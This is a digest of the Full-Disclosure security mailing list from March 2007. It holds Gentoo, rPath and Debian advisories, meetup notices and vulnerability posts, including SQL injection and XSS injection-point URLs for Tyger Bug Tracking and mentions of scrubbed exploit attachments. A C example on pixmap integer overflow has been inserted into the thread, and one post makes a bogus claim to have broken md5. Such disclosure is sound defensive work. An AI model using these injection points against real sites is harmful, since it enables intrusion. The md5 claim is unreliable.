     Title: Mozilla Firefox: Multiple vulnerabilities
      Date: March 02, 2007
      Bugs: #165555
        ID: 200703-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been reported in Mozilla Firefox, some of which may allow user-assisted arbitrary remote code execution.

Background
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla Project.

Affected packages
=================

    -------------------------------------------------------------------
     Package                        /  Vulnerable  /      Unaffected
    -------------------------------------------------------------------
  1  www-client/mozilla-firefox        < 2.0.0.2        *>= 1.5.0.10
                                                         >= 2.0.0.2
  2  www-client/mozilla-firefox-bin    < 2.0.0.2        *>= 1.5.0.10
                                                         >= 2.0.0.2
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Tom Ferris reported a heap-based buffer overflow involving wide SVG stroke widths that affects Mozilla Firefox 2 only. Various researchers reported some errors in the JavaScript engine potentially leading to memory corruption. Mozilla Firefox also contains minor vulnerabilities involving cache collision and unsafe pop-up restrictions, filtering or CSS rendering under certain conditions.

Impact
======

An attacker could entice a user to view a specially crafted web page that will trigger one of the vulnerabilities, possibly leading to the execution of arbitrary code. It is also possible for an attacker to spoof the address bar, steal information through cache collision, bypass the local files protection mechanism with pop-ups, or perform cross-site scripting attacks, leading to the exposure of sensitive information, like user credentials.

Workaround
==========

There is no known workaround at this time for all of these issues, but most of them can be avoided by disabling JavaScript.

Resolution
==========

Users upgrading to the following releases of Mozilla Firefox should note that this upgrade has been found to lose the saved passwords file in some cases. The saved passwords are encrypted and stored in the 'signons.txt' file of ~/.mozilla/ and we advise our users to save that file before performing the upgrade.

All Mozilla Firefox 1.5 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-1.5.0.10"

All Mozilla Firefox 1.5 binary users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-1.5.0.10"

All Mozilla Firefox 2.0 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-2.0.0.2"

All Mozilla Firefox 2.0 binary users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-2.0.0.2"

References
==========

  [ 1 ] CVE-2006-6077
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
  [ 2 ] CVE-2007-0775
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
  [ 3 ] CVE-2007-0776
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
  [ 4 ] CVE-2007-0777
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
  [ 5 ] CVE-2007-0778
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
  [ 6 ] CVE-2007-0779
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
  [ 7 ] CVE-2007-0780
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
  [ 8 ] CVE-2007-0800
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
  [ 9 ] CVE-2007-0801
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0801
  [ 10 ] CVE-2007-0981
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
  [ 11 ] CVE-2007-0995
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
  [ 12 ] Mozilla password loss bug
        https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c366

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 481 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/f5100796/attachment.bin

From falco at gentoo.org Sat Mar 3 16:34:19 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sat, 3 Mar 2007 17:34:19 +0100
Subject: [Full-disclosure] [ GLSA 200703-05 ] Mozilla Suite: Multiple vulnerabilities
Message-ID: <20070303163419.GB8439@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200703-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla Suite: Multiple vulnerabilities
      Date: March 03, 2007
      Bugs: #135257
        ID: 200703-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Several vulnerabilities exist in the Mozilla Suite, which is no longer supported by the Mozilla project.
Background
==========

The Mozilla Suite is a popular all-in-one web browser that includes a mail and news reader.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /      Unaffected
    -------------------------------------------------------------------
  1  www-client/mozilla         <= 1.7.13        Vulnerable!
  2  www-client/mozilla-bin     <= 1.7.13        Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Several vulnerabilities ranging from code execution with elevated privileges to information leaks affect the Mozilla Suite.

Impact
======

A remote attacker could entice a user to browse to a specially crafted website or open a specially crafted mail that could trigger some of the vulnerabilities, potentially allowing execution of arbitrary code, denials of service, information leaks, or cross-site scripting attacks leading to the robbery of cookies or authentication credentials.

Workaround
==========

Most of the issues, but not all of them, can be prevented by disabling the HTML rendering in the mail client and JavaScript on every application.

Resolution
==========

The Mozilla Suite is no longer supported and has been masked after some necessary changes on all the other ebuilds which used to depend on it. Mozilla Suite users should unmerge www-client/mozilla or www-client/mozilla-bin, and switch to a supported product, like SeaMonkey, Thunderbird or Firefox.

    # emerge --unmerge "www-client/mozilla"
    # emerge --unmerge "www-client/mozilla-bin"

References
==========

  [ 1 ] Official Advisory
        http://www.mozilla.org/projects/security/known-vulnerabilities.html#Mozilla

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 481 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/f5810cdb/attachment.bin

From announce-noreply at rpath.com Sat Mar 3 14:13:03 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Sat, 03 Mar 2007 09:13:03 -0500
Subject: [Full-disclosure] rPSA-2007-0048-1 tcpdump
Message-ID: <45e9826f.IDuL/PXXLBSOh6LT%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0048-1
Published: 2007-03-03
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Remote User Deterministic Denial of Service
Updated Versions:
    tcpdump=/conary.rpath.com at rpl:devel//1/3.9.5-0.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218
    https://issues.rpath.com/browse/RPL-1100

Description:
    Previous versions of the tcpdump package are vulnerable to a remote denial of service when printing 802.11 ethernet frames, only if the link type was specified explicitly on the tcpdump command line. No unauthorized access is understood to be enabled by this vulnerability.

From announce-noreply at rpath.com Sat Mar 3 14:15:51 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Sat, 03 Mar 2007 09:15:51 -0500
Subject: [Full-disclosure] rPSA-2007-0040-3 firefox thunderbird
Message-ID: <45e98317.YlMP32diPSAISo2N%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0040-3
Published: 2007-02-26
Updated:
    2007-02-26 Correctly formatted CVE URLs
    2007-03-03 Added newly-released thunderbird packages to advisory
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    firefox=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1
    thunderbird=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
    https://issues.rpath.com/browse/RPL-1081
    https://issues.rpath.com/browse/RPL-1103

Description:
    Previous versions of the firefox package are vulnerable to several types of attacks, some of which are understood to allow compromised or malicious sites to run arbitrary code as the user running the firefox browser.
2 March 2007 Update: The vulnerabilities previously resolved in the firefox package have now been resolved in the thunderbird package as well.

From shyaam at gmail.com Fri Mar 2 12:41:11 2007
From: shyaam at gmail.com (Shyaam)
Date: Fri, 2 Mar 2007 07:41:11 -0500
Subject: [Full-disclosure] March NorthernVirginia 2600/DefCon 571 Meeting Information
Message-ID:

Hi All,

There will be a NoVA 2600 meeting on March 2nd, which is today, and a DC571 meeting next Friday, which is Mar 9th. If anyone from NoVA has any questions about meeting locations, please do contact me at this email.

Kind Regards
Shyaam

From marcio.barbado at gmail.com Fri Mar 2 14:57:55 2007
From: marcio.barbado at gmail.com (M.B.Jr.)
Date: Fri, 2 Mar 2007 11:57:55 -0300
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To: <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com>
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com>
Message-ID: <2df3b0cb0703020657o158cbc47u53b2293d0184edcf@mail.gmail.com>

haha modern days underground survivors!
viva mr. Corley-Goldstein!

On 3/1/07, James Matthews wrote:
>
> Great, I cannot wait!
>
> On 2/28/07, Steven McGrath wrote:
> >
> > The March Chicago 2600 Meeting is near! The meeting will be Friday,
> > March 2nd at the Neighborhood Boys and Girls Club and will feature much
> > of the same usual fun that all of you have grown to expect!
> >
> > [Presentation Information]
> > - 9:00pm - Hacklab: Current Progress (Maniac, et al.)
> > - 10:00pm - How to build a public server (Maniac)
> > - After hours - Wii, Music, Socializing, etc.
> >
> > [General Information]
> > - Meeting Time: 7.00pm - Approx.
> > 3-5am
> > - Meeting Date: Friday, March 2nd
> > - Place : 2501 W Irving Park Road, Chicago
> > - More Info : http://chicago2600.net
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> --
> http://www.goldwatches.com/watches.asp?Brand=39
> http://www.wazoozle.com
>

--
Marcio Barbado, Jr.

From mc.iglo at googlemail.com Fri Mar 2 19:41:21 2007
From: mc.iglo at googlemail.com (MC Iglo)
Date: Fri, 2 Mar 2007 20:41:21 +0100
Subject: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
In-Reply-To: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com>
References: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com>
Message-ID: <99e73caa0703021141w17874804p58a2e65e19a55907@mail.gmail.com>

On my WBB 2.3.3 (and I think this is the default setting) you cannot access register.php when logged in (even as admin). So you need to be logged off to open the evil site. And when you are logged off, the cookie is simply useless.
Also, on my forum, only r_dateformat and r_timeformat are affected.

regards

2007/3/2, SaMuschie :
>
> +--------------------------------------- - -- -
> | SaMuschie Research Labs proudly presents . . .
> +------------------------------------------- -- - -
> | Application: Woltlab Burning Board (wbb)
> | Version: 2.3.6 (others not tested)
> | Vuln./Exploit Type: CSRF/XSS
> | Status: 0day
> +----------------------------------------- -- - -
> | Discovered by: Samenspender
> | Released: 20070302
> | SaMuschie Release Number: 5
> +------------------------------- - -- -
>
> CSRF/XSS Exploit:
>
> cat < wetpussy.html
>
> EOF
>
> +----------------------------- -- -
> | Lameness Disclaimer
> +------------------------------------- - -- - -
> | SaMuschie Research Labs was founded to publish
> | vulnerabilities within well known software products,
> | which are easy to discover and exploit.
> |
> | SaMuschie researchers just spend a minimum of time
> | and knowledge for each vulnerability. Hence readers of
> | this advisory are requested not to ask any questions
> | to the researchers.... they don't know the answer ;)
> +---------------------------------- - -- - -
>

From skodliv at gmail.com Sat Mar 3 15:04:27 2007
From: skodliv at gmail.com (poo)
Date: Sat, 3 Mar 2007 16:04:27 +0100
Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit
In-Reply-To: <45E85F73.40401@digit-labs.org>
References: <45E85F73.40401@digit-labs.org>
Message-ID:

keep disclosin!

On 3/2/07, mu-b wrote:
>
> Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including the
> latest). The vulnerability is a bog-standard stack based overflow in the
> call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).
>
> ---------------------------------------------------------------------------
> (mu-b at digit-labs.org)
>

--
smile tomorrow will be worse
From corrado.liotta at alice.it Sat Mar 3 17:39:06 2007
From: corrado.liotta at alice.it (corrado.liotta at alice.it)
Date: Sat, 3 Mar 2007 18:39:06 +0100
Subject: [Full-disclosure] Tyger Bug Tracking System Multiple Vulnerability
Message-ID:

-=[--------------------ADVISORY-------------------]=-
Tyger Bug Tracking System
Author: CorryL [corryl80 at gmail.com]
-=[-----------------------------------------------]=-

-=[+] Application: Tyger Bug Tracking System
-=[+] Version: 1.1.3
-=[+] Vendor's URL: http://uk.homeunix.org/tyger/cms/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Cross-Site Script\Sql injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.xoned.net
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck

..::[ Description ]::..

Tyger Bug tracking software has been designed and developed for individuals or groups of software developers to manage software development better. By using Tyger, teams of developers are able to communicate far better with fellow developers or end users, which ultimately improves the quality of your software project or product.

..::[ Proof Of Concept ]::..

[Sql injection]
http://remote_server/ViewBugs.php?s=[sql]&o=ASC

[Xss]
http://remote_server/Login.php/>">[XSS]
http://remote_server/Register.php/>">[XSS]

From psz at observed.de Sat Mar 3 19:06:46 2007
From: psz at observed.de (Paul Sebastian Ziegler)
Date: Sat, 03 Mar 2007 20:06:46 +0100
Subject: [Full-disclosure] PostScript security research
Message-ID: <45E9C746.50804@observed.de>

Hi,

I'm currently coming across a lot of PostScript documents.
And I realize that most people consider them as "pictures" and thus plainly open them. This is why I thought about testing its security and possibly creating some PoC to raise awareness.

During my research I found that PostScript has the possibility to open and manipulate files. Now that's a good start. :)
Also this project here proves that it must somehow be possible to "bind" to a port: http://public.planetmirror.com/pub/pshttpd/
(Still researching this one...)

However google hasn't been particularly helpful when it came to the following questions:
1) Has anybody researched this before (no need to crash open doors)
2) Is PostScript capable of using the system()-call or something similar?

Does anybody know about this?

Thanks in advance
Paul

From falco at gentoo.org Sat Mar 3 19:28:03 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sat, 3 Mar 2007 20:28:03 +0100
Subject: [Full-disclosure] ERRATA: [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code
Message-ID: <20070303192803.GC23196@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE]          GLSA 200703-01:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Snort: Remote execution of arbitrary code
      Date: February 23, 2007
   Updated: March 02, 2007
      Bugs: #167730
        ID: 200703-01:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The initial workaround provided by the GLSA does not avoid the mentioned vulnerability. The corrected section appears below.
Workaround
==========

Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc' section in /etc/snort/snort.conf.

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

From metaur at telia.com Sat Mar 3 22:44:23 2007
From: metaur at telia.com (Ulf Harnhammar)
Date: Sat, 3 Mar 2007 23:44:23 +0100
Subject: [Full-disclosure] PostScript security research
Message-ID: <20070303224423.GA3016@localhost.localdomain>

> Also this project here proves that it must somehow be possible to "bind"
> to a port: http://public.planetmirror.com/pub/pshttpd/
> (Still researching this one...)

I don't think it does. According to this link, ps-httpd gets started from (x)inetd:

http://209.85.135.104/search?q=cache:1k8IXp9mFDcJ:www.xent.com/april00/0257.html+%22ps-httpd%22+%2Binetd&hl=sv&ct=clnk&cd=3&gl=se

It's a nice hack, anyway!
Regards,
Ulf Harnhammar

From falco at gentoo.org Sun Mar 4 00:11:27 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sun, 4 Mar 2007 01:11:27 +0100
Subject: [Full-disclosure] [ GLSA 200703-06 ] AMD64 x86 emulation Qt library: Integer overflow
Message-ID: <20070304001127.GD3492@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200703-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: AMD64 x86 emulation Qt library: Integer overflow
      Date: March 04, 2007
      Bugs: #153704
        ID: 200703-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The AMD64 x86 emulation Qt library makes use of an insecure version of the Qt library, potentially allowing for the remote execution of arbitrary code.

Background
==========

The AMD64 x86 emulation Qt library for AMD64 emulates the x86 (32-bit) Qt library on the AMD64 (64-bit) architecture.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  emul-linux-x86-qtlibs           < 10.0                 >= 10.0

Description
===========

An integer overflow flaw has been found in the pixmap handling of Qt, making the AMD64 x86 emulation Qt library vulnerable as well.

Impact
======

By enticing a user to open a specially crafted pixmap image in an application using the AMD64 x86 emulation Qt library, a remote attacker could cause an application crash or the remote execution of arbitrary code with the rights of the user running the application.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All AMD64 x86 emulation Qt library users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-emulation/emul-linux-x86-qtlibs-10.0"

References
==========

[ 1 ] GLSA 200611-02
http://www.gentoo.org/security/en/glsa/glsa-200611-02.xml
[ 2 ] CVE-2006-4811
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
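The integer overflow class named in the GLSA above, as an added example in C (not Qt's code and not part of the advisory): the size computation for a pixmap buffer without and with an overflow check. The header layout, the limits and the function names are assumptions made for this illustration.

```c
/*
 * Added example, not Qt's code and not part of the GLSA: the bug class
 * behind a "pixmap integer overflow". An image header supplies width,
 * height and bytes per pixel, and the decoder allocates width * height *
 * bpp bytes. If that product wraps around in 32-bit arithmetic, a tiny
 * buffer is allocated and the pixel data is then written far past it.
 * The header layout, the limits and all function names are assumptions.
 */
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

typedef struct {
    uint32_t width;   /* pixels */
    uint32_t height;  /* pixels */
    uint32_t bpp;     /* bytes per pixel */
} pixmap_header;

/* Vulnerable pattern: 32-bit multiply with no overflow check. Returns the
 * (possibly wrapped) byte count that naive code would hand to malloc(). */
uint32_t pixmap_bytes_unchecked(const pixmap_header *h)
{
    return h->width * h->height * h->bpp;
}

/* Hardened pattern: reject zero or absurd dimensions up front, do the
 * arithmetic in 64 bits, and cap the result well below SIZE_MAX so a
 * crafted header cannot drive the allocation size into wraparound.
 * Returns 1 and stores the byte count in *out, or 0 to reject the header. */
int pixmap_bytes_checked(const pixmap_header *h, size_t *out)
{
    const uint32_t MAX_DIM   = 1u << 16;      /* 65536 px, example cap */
    const uint64_t MAX_BYTES = 256ull << 20;  /* 256 MiB, example cap */

    if (h->width == 0 || h->height == 0 || h->bpp == 0 || h->bpp > 16)
        return 0;
    if (h->width > MAX_DIM || h->height > MAX_DIM)
        return 0;
    /* With both dimensions <= 2^16 and bpp <= 16 the product is < 2^37,
     * so the 64-bit multiply itself cannot wrap. */
    uint64_t bytes = (uint64_t)h->width * h->height * h->bpp;
    if (bytes > MAX_BYTES)
        return 0;
    *out = (size_t)bytes;
    return 1;
}

/* Allocate a pixel buffer only after the size has been validated. */
unsigned char *pixmap_alloc(const pixmap_header *h)
{
    size_t bytes;
    if (!pixmap_bytes_checked(h, &bytes))
        return NULL;
    return malloc(bytes);
}

int main(void)
{
    /* Constructed header: 65536 x 65536 x 1 byte. In 32-bit arithmetic
     * 65536 * 65536 is exactly 2^32, which wraps to 0. */
    pixmap_header crafted = { 0x10000u, 0x10000u, 1u };
    pixmap_header normal  = { 640u, 480u, 4u };
    size_t n = 0;

    printf("crafted: unchecked size = %u bytes (wrapped)\n",
           (unsigned)pixmap_bytes_unchecked(&crafted));
    printf("crafted: checked accepts = %d\n",
           pixmap_bytes_checked(&crafted, &n));

    printf("normal:  unchecked size = %u bytes\n",
           (unsigned)pixmap_bytes_unchecked(&normal));
    if (pixmap_bytes_checked(&normal, &n))
        printf("normal:  checked size = %zu bytes\n", n);

    unsigned char *buf = pixmap_alloc(&normal);
    free(buf);
    return 0;
}
```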
From slythers at gmail.com Sun Mar 4 12:05:31 2007
From: slythers at gmail.com (Slythers Bro)
Date: Sun, 4 Mar 2007 13:05:31 +0100
Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2
In-Reply-To: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com>
References: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com>
Message-ID: <8f6a58a30703040405i6e3fe928hbd2027da3e049b12@mail.gmail.com>

sorry the good url is *http://www.Php-exploit.info/index.php?id=3407&com=#onlythecrimepaid*

On 3/4/07, Slythers Bro wrote:
>
> I broke md5
> I used an evolved quantic atomic library for recomputation
> where I compress the quantic flow :> and reduce the quantic recomputation
> time
>
> source code is here *http://www.php-exploit.info/index.php?id=md5-break-research&com=#onlythecrimepaid*

From slythers at gmail.com Sun Mar 4 12:00:41 2007
From: slythers at gmail.com (Slythers Bro)
Date: Sun, 4 Mar 2007 13:00:41 +0100
Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2
Message-ID: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com>

I broke md5
I used an evolved quantic atomic library for recomputation
where I compress the quantic flow :> and reduce the quantic recomputation time

source code is here *http://www.php-exploit.info/index.php?id=md5-break-research&com=#onlythecrimepaid*
From lolek1337 at googlemail.com Sun Mar 4 13:45:46 2007
From: lolek1337 at googlemail.com (Lolek of TK53)
Date: Sun, 4 Mar 2007 14:45:46 +0100
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID:

Hi,

On 3/2/07, sbauer at gjl-network.net wrote:
> Author: Sebastian Bauer
> Web: http://blog.gjl-network.net
> Date: 01/12/07
>
> Vuln. website: http://www.knorr.de
> Vulnerability: SQL Injection (mainly login authentication bypass + any
> other SQL inj. possibility), XSS
> Significance: Very Critical

OMFG who cares.....

From ge at linuxbox.org Sun Mar 4 11:56:09 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Sun, 4 Mar 2007 05:56:09 -0600 (CST)
Subject: [Full-disclosure] month of PHP bugs, secondary message?
Message-ID:

-----
3. Are PHP applications also a target of this initiative?

No they are not. If you want a month of PHP application bugs you can subscribe to the bugtraq or full-disclosure mailinglists.
-----

http://www.php-security.org/

Gadi.

From anonymousperzon at gmail.com Sun Mar 4 07:24:09 2007
From: anonymousperzon at gmail.com (Anonymous Person)
Date: Sun, 4 Mar 2007 01:24:09 -0600
Subject: [Full-disclosure] asterisk remote pre-auth denial of service
Message-ID: <98190afa0703032324w37dfad36y28d3c4350f84c09f@mail.gmail.com>

A very serious remote denial of service was recently patched in asterisk. Some limited information on the problem can be found here: http://asterisk.org/taxonomy/term/32

The bug exists in the asterisk SIP channel driver; anyone using asterisk running SIP is advised to patch their systems as soon as possible.
I am posting this code to highlight the severity of the bug, which was fixed in the asterisk release yesterday without much of a description.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: asterisk-sip-kill.c
Type: text/x-csrc
Size: 2816 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/8f02428c/attachment.bin

From meissner at suse.de Sun Mar 4 16:41:45 2007
From: meissner at suse.de (Marcus Meissner)
Date: Sun, 4 Mar 2007 17:41:45 +0100
Subject: [Full-disclosure] month of PHP bugs, secondary message?
In-Reply-To:
References:
Message-ID: <20070304164145.GA8921@suse.de>

On Sun, Mar 04, 2007 at 05:56:09AM -0600, Gadi Evron wrote:
> -----
> 3. Are PHP applications also a target of this initiative?
>
> No they are not. If you want a month of PHP application bugs you can
> subscribe to the bugtraq or full-disclosure mailinglists.
>
> -----
>
> http://www.php-security.org/

It's the "Month of PHP application bugs" since over 2 years now. Sad enough.

Ciao, Marcus

From jammer128 at gmail.com Sun Mar 4 17:18:33 2007
From: jammer128 at gmail.com (Jason Miller)
Date: Sun, 4 Mar 2007 11:18:33 -0600
Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2
In-Reply-To: <8f6a58a30703040405i6e3fe928hbd2027da3e049b12@mail.gmail.com>
References: <8f6a58a30703040400s698595e3ibc0e641b4c229679@mail.gmail.com> <8f6a58a30703040405i6e3fe928hbd2027da3e049b12@mail.gmail.com>
Message-ID: <829b2de40703040918id213052td87247793a91a10c@mail.gmail.com>

what a dumbass, don't bother clicking. it's just one of those lame click games where you get people to click your link for points.
On 3/4/07, Slythers Bro wrote:
>
> sorry the good url is *
> http://www.Php-exploit.info/index.php?id=3407&com=#onlythecrimepaid*
>
> On 3/4/07, Slythers Bro wrote:
> >
> > I broke md5
> > I used an evolved quantic atomic library for recomputation
> > where I compress the quantic flow :> and reduce the quantic
> > recomputation time
> >
> > source code is here *http://www.php-exploit.info/index.php?id=md5-break-research&com=#onlythecrimepaid
> > *
> >
>

From jmm at debian.org Sun Mar 4 17:57:37 2007
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 4 Mar 2007 18:57:37 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1262-1] New gnomemeeting packages fix arbitrary code execution
Message-ID: <20070304175736.GA3810@galadriel.inutil.org>

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1262-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
March 4th, 2007                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : gnomemeeting
Vulnerability  : format string
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2007-1007

